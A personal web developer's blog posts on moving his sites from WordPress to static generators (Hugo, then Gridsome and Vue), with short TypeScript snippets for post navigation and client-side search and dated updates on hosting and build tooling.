In my case I started from scratch. Getting a basic blog set up with a list of posts and individual entries to view is simple on its own. The combination of being able to use GraphQL to handle the specific queries, and much of the metadata, while still using markdown files as the source means it's structurally similar: make a markdown folder for the specific content type, add things there, and have a corresponding template for it to work with. I do really like Vue's use of single-file components, however: having the template's layout, scripts, styles, and in this specific case the GraphQL query visible in one place is wonderful for understanding what each component is doing at a glance.

The upside of more configuration up front is more flexibility overall, especially as there is already a solid Gridsome plugin ecosystem, which itself can rely on the larger library of Vue plugins for additional functionality. And in having to handle the configuration as well as write the code for template logic and behavior, I'm more aware of, and in control of, what the site can do. The practical example here is per-article navigation. There is already a built-in paginator component for handling the list, which I'm using, but for individual pages there wasn't a built-in way to do it. To make it work I wrote (with liberal borrowing from another site's working implementation) a few computed functions that used the GraphQL query to determine the next and previous blog post paths. The same method could be used to create more situation-specific setups like post series links, related content based on tags, or, for more commercially oriented sites, calls-to-action for specific products. For a server-side app this wouldn't be that special, but keep in mind this is a 100% static site with the ability to display dynamic data (see the search comment above).
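As an illustration of the idea (not Gridsome's API or my exact implementation), deriving previous and next paths from a sorted query result is a small pure function:

```typescript
// Illustrative sketch: given all posts from a GraphQL query, sorted
// newest-first, find the paths adjacent to the current post.
interface PostEdge {
  path: string
}

function adjacentPosts(posts: PostEdge[], currentPath: string) {
  const i = posts.findIndex((p) => p.path === currentPath)
  return {
    // null when the current post is first, last, or not found.
    previous: i > 0 ? posts[i - 1].path : null,
    next: i >= 0 && i < posts.length - 1 ? posts[i + 1].path : null,
  }
}
```

In a Vue component these two lookups would live in computed properties fed by the page query, which is what makes them cheap to reuse for series links or related-content variations.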

Okay, I'll leave it there for now; I don't want to write up anything exceptionally technical about it for the moment. I have two of my three main sites done to a basic level with this build now, and made a starter project from it which sped up the second design significantly. The third will likely take a similar amount of time, though I'll get to test a non-blog page layout for handling a content portfolio, which I haven't done for either of these.

And most importantly, now that these are done and I no longer feel that I need to fix fundamental build issues with old sites, the one big roadblock to writing and publishing new posts is out of the way, not to mention other major projects I've been thinking about. This has been a very important first step.

Static or Dynamic?

Cleaning up some hacked Wordpress sites recently reminded me of why I had shifted my own sites away from it and onto simpler tools which create static sites—tools that result in pure HTML/CSS/JS loaded directly in the browser, no server side processing required.

The original impetus for my own move was to remove the headaches and hassles around securing and maintaining Wordpress sites; note, though, that you could substitute Wordpress here for any other popular framework, particularly a CMS (Content Management System). Wordpress just happens to be a big target due to its popularity. It isn't that Wordpress is bad, full stop, but that I wasn't using any of the features that would have made the costs of maintaining it worthwhile.

Sidebar: amusingly, none of the features that would be useful enough for me to choose Wordpress were what Wordpress was originally built for, namely blogging. It has evolved far away from its original purpose as a blogging tool; one of the reasons why this blog began on Ghost.

How will someone use your site?

Will they be reading articles, watching videos, listening to podcasts, or more broadly consuming what you create? Or will they (also) be interacting with either your content or each other?

Only the latter justifies a dynamic site, because it requires a form of user authentication and user accounts to make it work.

There's a third case here, around eCommerce, but that's far more dependent upon the project's size and type of products being sold. There are solid 3rd party services that can handle transactions without needing to manage a store directly on your site.

The 2023 update

Weird to see when I originally wrote this piece, which was a quick bit to explain to myself the reasoning for choosing a static site at the time. The logic for the decision has held together, and even in some cases become stronger. The security benefits remain as strong, and with more options for integrating APIs and third-party tools it continues to make sense to maintain a light footprint static site like this for what I do.

In 2015, when I first began exploring static sites, the term JAMstack (Javascript, APIs, Markup) hadn't yet been popularized; 2016 has that honor, according to JAMstack's own home page. At the time I was settling into using static site generators, first Hugo and then the more recent pivot into using my own sites as a means of dogfooding Vue. For me static and JAMstack made sense, as I was already maintaining my own code, and it was overall less work to maintain a small Go- or Vue-based site, with some Node-based build tools, than the more traditional server-and-database-backed architecture.

I was making that switch for myself, but if I were taking on web development clients at the time I wouldn't have recommended JAMstack as an approach to them, despite saying above that the only justification for a dynamic site is user accounts and interaction. The reality is that the user accounts used to create the pages, posts, etc. also count, and there is still utility there; that is why systems with some kind of central CMS, like WordPress, Squarespace, Ghost, etc., were still better choices for non-developers: they offer a means of interacting with the application other than purely via text (markdown) and Git commits. As I'm both a developer and have gotten very comfortable with markdown, handling everything about my site inside my IDE is my comfort zone, but I guarantee you it's a text-only hell for most folks.

Has anything in that department changed since 2015? Yes and no; it's a bit like a barbell, with all the weight at both ends and almost none in the middle. In the world of static sites it still seems to require that kind of hands-on-code work to run them, so they remain suited to developer types. Meanwhile, in the DIY and low-to-mid website building space, for those who don't want to code, it still makes sense to use larger platforms like those mentioned earlier, and both those and others (like Wix) have improved their designs and UX since then.

JAMstack becomes a great choice again once you have a team, though. The API part of the JAMstack architecture means you can build an independent front-end that works together with tools like a headless CMS (for your content and marketing teams) and serverless functions for some types of on-site interactions, and can then decouple your backend services in a way that makes for a more flexible set of systems, well suited to all the potential applications that might need to consume data from that backend API (web, mobile, etc.).

Building a Static Site with Hugo

Well, that took longer to complete than expected (as always). After experimenting with Docpad for a while I stumbled onto a number of other static site generators, finally selecting Hugo. Hugo's speed—it regenerates the whole site (all 140 pages) within ~1.5 seconds—combined with the flexible structure convinced me to give it a go.

Hugo's speediness is undoubtedly due in part to Go, as in Golang, a newer language originally developed at Google. The beauty of Hugo has been that I've not had to become a master of Golang to understand it. Hugo's templating resembles AngularJS or Handlebars in its love of double curly braces {{ .Title }} and similar setups. Fairly intuitive, although I'm definitely still learning.

For screenshots of the site, head over here or the live site here. Update: all sites I maintain, including this one, are currently using Hugo + Netlify.

Design Details

The switch from Wordpress to Hugo is a forward-looking attempt to minimize the amount of maintenance I have to do on the site, and to enable faster changes. While finishing the site took several months—working typically at most an hour a day on it—the process of iterating on the design and testing features was super quick.

Almost all of the testing took place locally, on my computer, and with Hugo's speedy page regeneration I was able to make changes very quickly, without having to debug strange bits of PHP or Javascript code in the process.

Otherwise I went straight from a super simple hand-drawn mockup of the site structure to building out a prototype HTML version within Hugo.

For a while I had the silly idea of coding all the CSS by hand, but that created resistance, and getting started on that part of the project was delayed for weeks because of it... then I used Skeleton as a base and everything went a billion times faster.

The bulk of designing was getting the initial layout working within the CSS, done through Stylus, and then tweaking it as needed. All done mobile-first, of course.

The one major pivot was with the grid system. Originally I used Skeleton's built-in grids, but I wasn't happy with the way it was working across the entire site, so I switched back to using Jeet, which integrates nicely with Stylus.


What I'm particularly enjoying now is how I can push new posts and changes to the site. I still do all my writing and code locally, testing it without even necessarily needing an internet connection. Once I've finalized the new changes all I have to do is use Git to push the newest changes to the server, and a script will automatically run Hugo to regenerate the folder. Fantastic.

Future Plans

The one major downside to a static site is the lack of a search function. Right now a Google custom search is a good workaround... but Hugo now supports data files (JSON specifically), which should in theory allow for an intuitive site search that still doesn't require a database. We'll see soon(ish) enough.
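The idea would be to have Hugo emit a JSON index of pages at build time and filter it client-side. A hypothetical sketch, where the IndexEntry shape is an assumption for illustration rather than anything Hugo outputs:

```typescript
// Hypothetical client-side search over a build-time JSON index.
interface IndexEntry {
  title: string
  url: string
  content: string
}

// Case-insensitive substring match over title and body text.
function searchIndex(index: IndexEntry[], query: string): IndexEntry[] {
  const q = query.toLowerCase()
  return index.filter(
    (entry) =>
      entry.title.toLowerCase().includes(q) ||
      entry.content.toLowerCase().includes(q)
  )
}
```

In the browser this index would be fetched once and searched in memory, so no database or server-side processing is involved.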

All in all, while there's certainly a learning curve, I highly recommend Hugo for building a CMS-free site. While I'm enjoying Ghost for this blog, there's a distinct possibility of transitioning this to Hugo as well in the future. Futzing with logins and updates just gets in the way of writing when you're doing this solo.


Yup, decided to transition this site onto Hugo as well, with a new design! In some ways less fancy than the original theme (no jQuery animation tricks added as of yet) but I like it. There's plenty of work to be done around making pagination prettier, adding some CSS animations, and gradual tweaks to typography and styling, but it's a good start.

Larger update (2019 edition)

Much has changed in terms of the plumbing of this site and my others. While all of them are still built with Hugo, since writing this I've transitioned all of my hosting to Netlify, and as part of that transition changed the build process to be based on their Victor Hugo boilerplate. The two major changes have been to my CSS pre-processor, from Stylus to PostCSS (I love the modularity, though sometimes getting specific plugins to function can be finicky), and to my task runner and builder, from Gulp to Webpack. Overall I'm happy with the new setup: I can simply push changes to my git repo, staged in this case on Bitbucket, and Netlify automatically rebuilds the site each time it detects a change, plus gives me logs of errors if anything in the build process fails. So far so good. The only significant challenge I'm finding with this method is cleanly updating the Victor Hugo boilerplate files (package.json and sometimes the webpack config) without losing my own changes to the tooling. It doesn't happen often, but it does add a few hours of tinkering when it causes issues; that's the life of anything that relies on Node packages for functionality.